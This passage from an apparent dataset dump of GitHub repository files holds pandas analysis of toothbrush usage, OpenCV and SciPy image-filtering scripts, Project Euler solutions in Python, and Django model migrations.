2pm is a morning brush while every brush after 2pm is an evening brush.\n\n # New column for morning (True) and afternoon (False) brushes\n raw_df['morning'] = raw_df['TimestampUTC'].dt.hour <= 14\n\n # New column from weekday & drop TimestampUTC\n raw_df['weekday'] = raw_df['TimestampUTC'].dt.day_name().drop(columns=['TimestampUTC'])\n\n # Group by user, weekday, morning/afternoon\n threshold_selector_user = raw_df.PlaybrushID != raw_df.PlaybrushID.shift(1)\n threshold_selector_weekday = raw_df.weekday != raw_df.weekday.shift(1)\n threshold_selector_morning = raw_df.morning != raw_df.morning.shift(1)\n groups_user = threshold_selector_user.cumsum()\n groups_weekday = threshold_selector_weekday.cumsum()\n groups_morning = threshold_selector_morning.cumsum()\n raw_df = raw_df.groupby([groups_user, groups_weekday, groups_morning]).\\\n agg({'PlaybrushID': min, 'brush_time': max, 'morning': min, 'weekday': min}).reset_index(drop=True)\n\n # Add groups\n raw_df = pd.merge(raw_df, groups_df, how='left', left_on='PlaybrushID', right_on='PBID').drop(columns=['PBID'])\n\n # Split brushes per weekday\n raw_df = raw_df.groupby(['group', 'PlaybrushID', 'weekday']).agg(['mean', 'count']).drop(columns=['morning'])\n raw_df.reset_index(inplace=True)\n raw_df['avg-brush-time'] = raw_df.brush_time['mean']\n raw_df['count'] = raw_df.brush_time['count']\n raw_df = raw_df.drop(columns=['brush_time'])\n\n raw_df = raw_df.pivot(index=['group', 'PlaybrushID', 'avg-brush-time'], columns=\"weekday\", values='count')\n\n raw_df.reset_index(inplace=True)\n raw_df = raw_df.groupby(['group', 'PlaybrushID']).agg({'avg-brush-time': np.mean, 'Monday': sum, 'Tuesday': sum,\n 'Wednesday': sum, 'Thursday': sum, 'Friday': sum,\n 'Saturday': sum, 'Sunday': sum})\n\n # total-brushes\n raw_df['total-brushes'] = raw_df[['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday',\n 'Sunday']].sum(axis=1)\n\n # twice-brushes\n raw_df['twice-brushes'] = raw_df[raw_df == 2.0].count(axis=1)\n\n # reorder and format\n cols = raw_df.columns.tolist()[1:] + raw_df.columns.tolist()[:1]\n raw_df = raw_df[cols]\n raw_df = raw_df.rename(columns={\"Monday\": \"mon\", \"Tuesday\": \"tue\", \"Wednesday\": \"wed\", \"Thursday\": \"thu\",\n \"Friday\": \"fri\", \"Saturday\": \"sat\", 'Sunday': 'sun'})\n raw_df.index.names = ['group', 'PBID']\n raw_df = raw_df.astype({'mon': int, 'tue': int, 'wed': int, 'thu': int, 'fri': int, 'sat': int, 'sun': int,\n 'total-brushes': int})\n\n # Task 2 - Group Dynamics\n # OUT: group, total-brushes, avg-brushes, avg-brush-time, score-performance\n group_dynamic_df = raw_df.copy()\n group_dynamic_df.reset_index(inplace=True)\n\n group_dynamic_df = group_dynamic_df.drop(columns=['PBID', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun',\n 'twice-brushes'], axis=1)\n\n group_dynamic_df['avg-brushes'] = group_dynamic_df['total-brushes']\n\n group_dynamic_df = group_dynamic_df.groupby(['group']).agg({'total-brushes': sum, 'avg-brush-time': np.mean,\n 'avg-brushes': np.mean})\n\n # score-performance is the result of average brush time vs average brushes\n group_dynamic_df['score-performance'] = group_dynamic_df['avg-brush-time'] * group_dynamic_df['avg-brushes']\n\n group_dynamic_df = group_dynamic_df.sort_values(by=['score-performance'], ascending=False)\n\n return raw_df.to_csv(float_format='%.2f'), group_dynamic_df.to_csv(float_format='%.2f')\n"
}
] | 6 |
Yurwar/python-image-processing | https://github.com/Yurwar/python-image-processing | da88909f81dc552662957fbfd3f35d83dda523a1 | 573da05530b8bbea4c3d9d0bdd375ddef68ccbc5 | 7984fdf4718e3b57ffc7ef1ac9c7f376ca4c21d4 | refs/heads/master | 2022-09-20T07:17:20.727184 | 2020-06-02T10:31:59 | 2020-06-02T10:31:59 | 268,105,598 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6480836272239685,
"alphanum_fraction": 0.700348436832428,
"avg_line_length": 22.91666603088379,
"blob_id": "84ca3866dd0881bcd87cdf7ea749a9cb51530e95",
"content_id": "47465b4e863985eab726016e2cd6e009dba330bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 12,
"path": "/opencv-sobel-edge-detection.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "import cv2.cv2 as cv2\nfrom matplotlib import pyplot\n\nimage = cv2.imread('images/man_feels_aversion.jpg', 0)\n\nsobelX = cv2.Sobel(image, -1, 1, 0, ksize=5)\n\nsobelY = cv2.Sobel(image, -1, 0, 1, ksize=5)\n\npyplot.imshow(sobelX, cmap='gray')\n# pyplot.imshow(sobelY, cmap='gray')\npyplot.show()\n"
},
{
"alpha_fraction": 0.7227723002433777,
"alphanum_fraction": 0.7524752616882324,
"avg_line_length": 25.933332443237305,
"blob_id": "bde1e6e7b77750753175767bdc9130993ba4b84d",
"content_id": "f02c78d3be7ce33be7990cbaab060dccbc1b5053",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 15,
"path": "/gray-level-transform.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nfrom pylab import *\n\nINTERVAL_END = 255.0\nINTERVAL_START = 100.0\nNEGATION_C = 255\n\noriginalImage = array(Image.open('images/doctor.jpg').convert('L'))\ngray()\nnegativeImage = NEGATION_C - originalImage\nclampedImage = (INTERVAL_START / NEGATION_C) * originalImage + INTERVAL_START\ntransformedImage = INTERVAL_END * (originalImage / INTERVAL_END) ** 2\n\nimshow(transformedImage)\nshow()\n"
},
{
"alpha_fraction": 0.744027316570282,
"alphanum_fraction": 0.7576791644096375,
"avg_line_length": 35.625,
"blob_id": "8b9e68e87a8f63d749c22fad5642291596c8fe31",
"content_id": "f182600bb040b91346cd527deddaaa80f9a08c4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 8,
"path": "/neighborhood-median-filter.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "import scipy.ndimage\nfrom PIL import Image\n\noriginalImage = Image.open('images/man_and_child.jpg')\nb = scipy.ndimage.filters.median_filter(originalImage, size=5, footprint= None,output=None, mode='reflect', cval=0.0, origin=0)\nb = Image.fromarray(b)\n\nb.save('images/median_man_and_child.jpg')\n"
},
{
"alpha_fraction": 0.7246376872062683,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 26.600000381469727,
"blob_id": "a7f7080b3984d198a8971c1a50cc7bac06f3255f",
"content_id": "67acf0f87fba0de0a37d109acb29356ce762142a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 10,
"path": "/neighborhood-mean-filter.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "import numpy\nfrom PIL import Image\nimport scipy.ndimage\n\noriginalImage = Image.open('images/man_and_child.jpg').convert('L')\n\nkoef = numpy.ones((5, 5)) / 25\nb = scipy.ndimage.filters.convolve(originalImage, koef)\nb = Image.fromarray(b)\nb.save('images/mean_man_and_child.jpg')\n"
}
] | 4 |
ashokgaire/project_EULER | https://github.com/ashokgaire/project_EULER | 3860a6530221123410566ea32b24a4b5de39a19e | b22cf37d1855b08f8cb38eb819e0ff85aa251058 | 19ef0c28258de6c06d7b64b85046160a83326a27 | refs/heads/main | 2023-03-31T02:11:51.467492 | 2021-04-05T06:24:28 | 2021-04-05T06:24:28 | 353,710,437 | 0 | 0 | null | 2021-04-01T13:31:17 | 2021-04-04T15:17:04 | 2021-04-05T06:24:28 | Python | [
{
"alpha_fraction": 0.4705035984516144,
"alphanum_fraction": 0.5208632946014404,
"avg_line_length": 16.820512771606445,
"blob_id": "1ce53383ff189948bdf1853c14ce8569eaab75ef",
"content_id": "af0ab2cf338fa83c0f52a59e0821a2649469fc40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 39,
"path": "/difficulty(5%)/special_pythagorean_triplet.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 9\n\n\n\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\na2 + b2 = c2\n\nFor example, 3**2 + 4**2 = 9 + 16 = 25 = 5**2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\n\"\"\"\n\ndef checkTheorem(a,b,c):\n return a**2 + b**2 == c**2\n\ndef condition(a,b,c):\n return a < b < c\n\n\ndef checkSum(a,b,c):\n return a+b+c == 1000\n\ndef find():\n sum = 1000\n product = 0\n for a in range(1,sum//3):\n for b in range(a+1,sum//2):\n c = sum -a -b\n if checkTheorem(a,b,c):\n print(a,b,c)\n product = a * b *c\n return product\n\n\n \nprint(find())\n"
},
{
"alpha_fraction": 0.45534151792526245,
"alphanum_fraction": 0.5061296224594116,
"avg_line_length": 14.45945930480957,
"blob_id": "b33a845bba022903e596acd1b1986b06fdda427b",
"content_id": "427c9939d0e74c7bf5205325b10918176a4276ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 37,
"path": "/difficulty(5%)/10001st_prime.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 7 \n\n\n\nBy listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n\nWhat is the 10001st prime number?\n\n\"\"\"\n\ndef checkPrime(val):\n check = True\n for i in range(2,val):\n if val % i == 0:\n check = False\n break\n else:\n check = True\n \n return check\n\ndef Prime(n):\n a = 2\n primeList = []\n\n while len(primeList) < n:\n if checkPrime(a):\n \n primeList.append(a)\n a = a + 1\n print(primeList[n-1])\n\n\nPrime(6)\n\n#104743"
},
{
"alpha_fraction": 0.5402626991271973,
"alphanum_fraction": 0.595659613609314,
"avg_line_length": 21.753246307373047,
"blob_id": "3092f9c3eba4729927f818721429bc37b349a509",
"content_id": "57c989d93d59130c2b31f32876f1c808d0942196",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1751,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 77,
"path": "/difficulty(5%)/highly_divisible_traingular_number.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nproblem 10 \n\n\n\nThe sequence of triangle numbers is generated by adding the natural numbers.\n\n So the 7th triangle number would be 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28.\n The first ten terms would be:1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n\nLet us list the factors of the first seven triangle numbers:\n\n 1: 1\n 3: 1,3\n 6: 1,2,3,6\n 10: 1,2,5,10\n 15: 1,3,5,15\n 21: 1,3,7,21\n 28: 1,2,4,7,14,28\n\nWe can see that 28 is the first triangle number to have over five divisors.\n\nWhat is the value of the first triangle number to have over five hundred divisors?\n\n\"\"\"\n\nimport time\nimport functools\n\nstime = time.time()\n\n#we start wth number 28\nn = 28\n\nwhile True:\n # sum of number from 1 to n\n triangle_number = n*(n+1)/2\n n = n+1\n # a dict to stre powers of prime\n dic = {}\n\n # startiing with a prime number 2\n i = 2\n #for loop to factor a number\n while i <= triangle_number:\n #if i divides the number , then it is a prime factor\n if triangle_number % i == 0:\n #changing the value of number so that we will not divide it with the same number again and again\n triangle_number = triangle_number/i\n\n # we are storing the value in terms of power of the prime number\n\n if i in dic:\n dic[i] +=1\n else:\n dic[i] = 1\n i -=1\n i +=1\n\n # increasing the value of power by 1 to find the number of divisors\n powers = map(lambda x:(x+1),dic.values())\n \n\n # number of divisors\n divisors = functools.reduce(lambda x,y:x*y,powers)\n print(divisors)\n\n # conition to check if divisors > 500\n if divisors > 500:\n print((n-1)*(n)/2)\n break\n\netime = time.time()\n\n\nprint(etime-stime)"
},
{
"alpha_fraction": 0.6350710988044739,
"alphanum_fraction": 0.6540284156799316,
"avg_line_length": 16.66666603088379,
"blob_id": "f3ded4f1612dd01853e0b67d5f1765d6ac126bcb",
"content_id": "a0cc52d53c98eb9a81fc131e009c094817b35440",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 12,
"path": "/difficulty(5%)/largest_sum.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "'''\n\nWork out the first ten digits of the sum of the following one-hundred 50-digit numbers.\n\n'''\n\n\n\nwith open(\"data.txt\",\"r\") as file:\n data = [int(line.strip()) for line in file]\n\nprint(str(sum(data))[:10])"
},
{
"alpha_fraction": 0.6339285969734192,
"alphanum_fraction": 0.6741071343421936,
"avg_line_length": 20.03125,
"blob_id": "9e361533bf5073f777a34068e6cb467c06c8a053",
"content_id": "a966b82d7dca015a92cc4fc3562249a43cb55152",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 32,
"path": "/difficulty(5%)/sum_square_difference.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "'''\nproblem 6\n\nThe sum of the squares of the first ten natural numbers is, 385\n\nThe square of the sum of the first ten natural numbers is,3025\n\nHence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is\n3025 - 385 = 2640\n\nFind the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.\n\n'''\n\ndef sumOfSquare(n):\n sum = 0\n for i in range(n+1):\n sum += i*i\n\n return sum\n\ndef squareOfSum(n):\n sum = 0\n for i in range(n+1):\n sum +=i\n return sum**2\n \n\ndef result(n):\n return squareOfSum(n) -sumOfSquare(n)\n\nprint(result(100))"
},
{
"alpha_fraction": 0.5527728199958801,
"alphanum_fraction": 0.5921288132667542,
"avg_line_length": 20.461538314819336,
"blob_id": "4260ee03d7d3535f584fb5403bb7060241a9d893",
"content_id": "2f6994ff0dfe909e281ac7fba426e0eea54881e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 26,
"path": "/difficulty(5%)/largest_palindrome_product.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 4 \n\n\nA palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit number\n\"\"\"\n\n\ndef checkPalindrome(value):\n return str(value) == str(value)[::-1]\n\ndef palindrome():\n a = {}\n for i in range(0,1000):\n for j in range(0,1000):\n c = i * j\n \n if checkPalindrome(c):\n a[c] = str(i) +\"*\"+ str(j)\n return a\n\n\nresult = palindrome()\nprint(max(result))\n\n"
},
{
"alpha_fraction": 0.36346152424812317,
"alphanum_fraction": 0.4423076808452606,
"avg_line_length": 16.79310417175293,
"blob_id": "b9f88dec8bb5ffa049e42ca7b909868c734cdb45",
"content_id": "3aa46ac9cde0f461f4bc678d03dd986235f8087e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 520,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 29,
"path": "/difficulty(5%)/largest_prime_factor.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\n\"\"\"\nProblem 3\nThe prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143 ?\n\n\"\"\"\n\ndef primefactor(n):\n if n < 0 :\n return\n p = 2\n PF = []\n while True:\n if n >= p ** 2:\n if n % p == 0:\n n = n/p\n PF.append(p)\n \n else:\n p +=1\n else:\n PF.append(int(n))\n break\n return PF\n \n\nresult = primefactor(600851475143)\nprint(max(result))\n\n\n\n"
},
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6432291865348816,
"avg_line_length": 16.5,
"blob_id": "0308d86031891b0b7249c2f7091da3d2863b6bbb",
"content_id": "806c18f0f231df8c64f2046b8a307b56a8924612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 22,
"path": "/difficulty(5%)/smallest_multiple.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 5\n\n\n\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n\n\n\"\"\"\n\ndef gcd(x,y):\n return y and gcd(y, x % y) or x\n\ndef lcm(x,y):\n return x * y / gcd(x,y)\n \nn = 1\nfor i in range(1, 21):\n n = lcm(n, i)\nprint(n)"
},
{
"alpha_fraction": 0.5646766424179077,
"alphanum_fraction": 0.638059675693512,
"avg_line_length": 32.125,
"blob_id": "cbc87fcdec9841f5b4cab706700623e67970052a",
"content_id": "d64c3988daabea2c3949baee21f5c1db762d308e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 804,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 24,
"path": "/difficulty(5%)/even_fibonacci.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\n\"\"\"\nEach new term in the Fibonacci sequence is generated by adding the previous two terms. By starting with 1 and 2, the first 10 terms will be:\n\n1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...\n\nBy considering the terms in the Fibonacci sequence whose values do not exceed four million, find the sum of the even-valued terms.\n\"\"\"\n\n\nimport math\n\nSQ5 = 5 ** .5\nprint(SQ5)\nPHI = (1+SQ5) /2\n\ndef allEvenFibonacciUpTO(limit):\n highestIndexBelowLimit = math.floor(math.log(limit * SQ5) / math.log(PHI))\n print(\"highest_limit:\", highestIndexBelowLimit)\n\n n = math.floor(highestIndexBelowLimit / 3)\n result = ((PHI ** (3 * n + 3) - 1) / (PHI ** 3 - 1) - ((1 - PHI) ** (3 * n + 3) - 1) / ((1 - PHI) ** 3 - 1)) / SQ5\n return result\n \nprint(int(allEvenFibonacciUpTO(4e6))) # // 4613731.999999999\n\n\n \n\n"
},
{
"alpha_fraction": 0.43621399998664856,
"alphanum_fraction": 0.4835391044616699,
"avg_line_length": 12.571428298950195,
"blob_id": "58d881d77edba7fa087fe0f2b1b72764bb91bc22",
"content_id": "7679f66ac524d4d16b1e52b23a7b4ebe8744cf39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 35,
"path": "/difficulty(5%)/summation_of_primes.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 10\n\n\n\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\nFind the sum of all the primes below two million.\n\n\"\"\"\n\nimport math\ndef checkPrime(val):\n \n for i in range(2,int(math.sqrt(val))+1):\n if val % i == 0:\n return False\n \n \n return True\n \n \n\ndef Prime(n):\n a = 2\n sum = 0\n\n \n for i in range(2,n):\n if checkPrime(i):\n sum = sum + i\n return sum\n\n\nprint(Prime(2000000))\n\n \n\n"
},
{
"alpha_fraction": 0.5631720423698425,
"alphanum_fraction": 0.7029569745063782,
"avg_line_length": 25.464284896850586,
"blob_id": "600837efb18812bf47f15468863d1beb7133cb78",
"content_id": "5229db38c998ab1978b5a9ec18d623fea0cd2f4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 744,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 28,
"path": "/difficulty(5%)/multple.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\" \nMultiple of 3 and 5 \n\n\nIf we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFind the sum of all the multiples of 3 or 5 below 1000.\n\n\"\"\"\n\n######### O(1) time method \n\nLIMIT=99999999999999999999999999999999999999999999999999999999999999999999999\n\n# Get the upper bounds for the arithmetic series\nupper_for_three = LIMIT // 3\nupper_for_five = LIMIT // 5\nupper_for_fifteen = LIMIT // 15\n\n# calculate sums\nsum_three = 3*upper_for_three*(1 + upper_for_three) / 2\nsum_five = 5*upper_for_five*(1 + upper_for_five) / 2\nsum_fifteen = 15*upper_for_fifteen*(1 + upper_for_fifteen) / 2\n\n# calculate total\ntotal = sum_three + sum_five - sum_fifteen\n\nprint(int(total))\n\n\n\n"
},
{
"alpha_fraction": 0.5316455960273743,
"alphanum_fraction": 0.5705243945121765,
"avg_line_length": 19.054546356201172,
"blob_id": "634e75510e39531459e926315aca606efd50278b",
"content_id": "d33a822ee82eb763b4aba6a371b77e819e05b4db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 55,
"path": "/difficulty(5%)/Lattice_paths.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 15\n\nStarting in the top left corner of a 2×2 grid, and only being able to move to the right and down, \nthere are exactly 6 routes to the bottom right corner.\n\nHow many such routes are there through a 20×20 grid?\n\"\"\"\n\n\n# Recursive soluton\ncache = {}\ndef countRoutes(m,n):\n if n == 0 or m == 0:\n return 1\n\n if (m,n) in cache.keys():\n return cache[(m,n)]\n cache[(m,n)] = countRoutes(m,n-1) + countRoutes(m-1,n)\n return cache[(m,n)]\n#print(countRoutes(20,20))\n\n# Iterative Solution O(mxn) time\n\ndef countRoute(m,n):\n grid = [[0 for i in range(m+1)] for j in range(n+1)]\n \n\n for i in range(0,m+1):\n grid[i][0] = 1\n\n for j in range(0,n+1):\n grid[0][j] = 1\n print(grid)\n \n for i in range(1,m+1):\n for j in range(1,n+1):\n grid[i][j] = grid[i-1][j] + grid[i][j-1]\n return grid[m][n]\n\n#print(countRoute(3,3))\n\n\n########## Combinatorial Solution O(n) time and O(1) space\n\n# m = n for perfect grid\ndef Count(n):\n result = 1\n\n for i in range(1,n+1):\n result = result *(n+i)/i\n\n print(result)\n\nCount(20)\n\n\n\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 25,
"blob_id": "3cbd0459d29d05f688a1373a056d5a42188ea5e7",
"content_id": "f580d1da3a9b255c46e3c6a38051bf4b212299e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "# project_EULER\nsolution of project euler in python\n"
},
{
"alpha_fraction": 0.6088849902153015,
"alphanum_fraction": 0.650696873664856,
"avg_line_length": 22.9375,
"blob_id": "1e5544e1c4dc37b370a80783cc7d24d7099ece0e",
"content_id": "6132ab54089fec53122e8d723ce7b09d4685190b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 48,
"path": "/difficulty(5%)/longest_collatz_sequence.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe following iterative sequence is defined for the set of positive integers:\n\nn → n/2 (n is even)\nn → 3n + 1 (n is odd)\n\nUsing the rule above and starting with 13, we generate the following sequence:\n13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1\n\nIt can be seen that this sequence (starting at 13 and finishing at 1) contains 10 terms. \nAlthough it has not been proved yet (Collatz Problem), it is thought that all starting numbers finish at 1.\n\nWhich starting number, under one million, produces the longest chain?\n\nNOTE: Once the chain starts the terms are allowed to go above one million\n\n\"\"\"\n\n\nnumber = 1000000\n\nsequenceLength = 0\nstartingNumber = 0\ncache = [None]*(number+1)\n\nfor i in range(len(cache)):\n cache[i] = -1\n\ncache[1] = 1\n\nfor i in range(2,number):\n sequence = i\n k = 0\n while(sequence !=1 and sequence >=i):\n k+=1\n if sequence % 2 == 0:\n sequence = sequence/2\n else:\n sequence = sequence*3 +1\n\n \n cache[i] = k + cache[int(sequence)]\n\n if(cache[i] > sequenceLength):\n sequenceLength = cache[i]\n startingNumber = i\n\nprint(startingNumber, sequenceLength)"
}
] | 14 |
up-x-men/ssp-api | https://github.com/up-x-men/ssp-api | 2e405117da4d12ca66ee37903127d657b754d8ac | 6f32bf3d40da938345e49de213bef658b66c0d46 | ed0de46a3edb6f73a16036f5da4707f87c0afe34 | refs/heads/master | 2017-05-08T22:37:02.953236 | 2017-05-08T01:48:54 | 2017-05-08T01:48:54 | 82,298,011 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.49061521887779236,
"alphanum_fraction": 0.5912408828735352,
"avg_line_length": 48.17948532104492,
"blob_id": "b301d247cd06bb4899fd540b10c41acbf1d764ad",
"content_id": "c6770ee350bc169495974211e92795432f924cc1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1918,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 39,
"path": "/apps/serverApplication/migrations/0001_initial.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-10 15:46\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Application',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('ip', models.CharField(max_length=50, verbose_name='IP\\u5730\\u5740')),\n ('username', models.CharField(max_length=20, verbose_name='\\u7528\\u6237\\u540d')),\n ('user', models.CharField(max_length=10, verbose_name='\\u4f7f\\u7528\\u4eba')),\n ('team', models.CharField(max_length=50, verbose_name='\\u5ba4/\\u56e2\\u961f')),\n ('source', models.CharField(max_length=50, verbose_name='\\u6765\\u6e90')),\n ('environment', models.CharField(max_length=20, verbose_name='\\u73af\\u5883\\u7c7b\\u522b')),\n ('os', models.CharField(max_length=10, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf')),\n ('applyTime', models.CharField(max_length=100, verbose_name='\\u7533\\u8bf7\\u65f6\\u95f4')),\n ('expireDate', models.CharField(max_length=100, verbose_name='\\u5230\\u671f\\u65f6\\u95f4')),\n ('comment', models.TextField(blank=True, verbose_name='\\u7528\\u9014\\u63cf\\u8ff0')),\n ('lastModified', models.CharField(max_length=100)),\n ('received', models.CharField(default='no', max_length=10, verbose_name='\\u662f\\u5426\\u5df2\\u7ecf\\u56de\\u6536')),\n ],\n options={\n 'ordering': ('applyTime',),\n 'verbose_name': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7\\u4fe1\\u606f',\n 'verbose_name_plural': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7\\u4fe1\\u606f',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.4920634925365448,
"alphanum_fraction": 0.6078270673751831,
"avg_line_length": 57,
"blob_id": "20517a6abf90450f2e6a64dbc7b067060a8d2112",
"content_id": "1072453bbdf90b6105e7b3759d8be6519c0c57ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3654,
"license_type": "no_license",
"max_line_length": 267,
"num_lines": 63,
"path": "/apps/contractBudget/migrations/0001_initial.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-27 16:26\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Budget',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('year', models.CharField(max_length=10, verbose_name='\\u9884\\u7b97\\u5e74\\u5ea6')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6dfb\\u52a0\\u65f6\\u95f4')),\n ('lastModified', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('year',),\n 'verbose_name': '\\u9879\\u76ee\\u9884\\u7b97',\n 'verbose_name_plural': '\\u9879\\u76ee\\u9884\\u7b97',\n },\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('projectId', models.CharField(max_length=200, unique=True, verbose_name='\\u9879\\u76ee\\u7f16\\u53f7')),\n ('name', models.CharField(max_length=200, 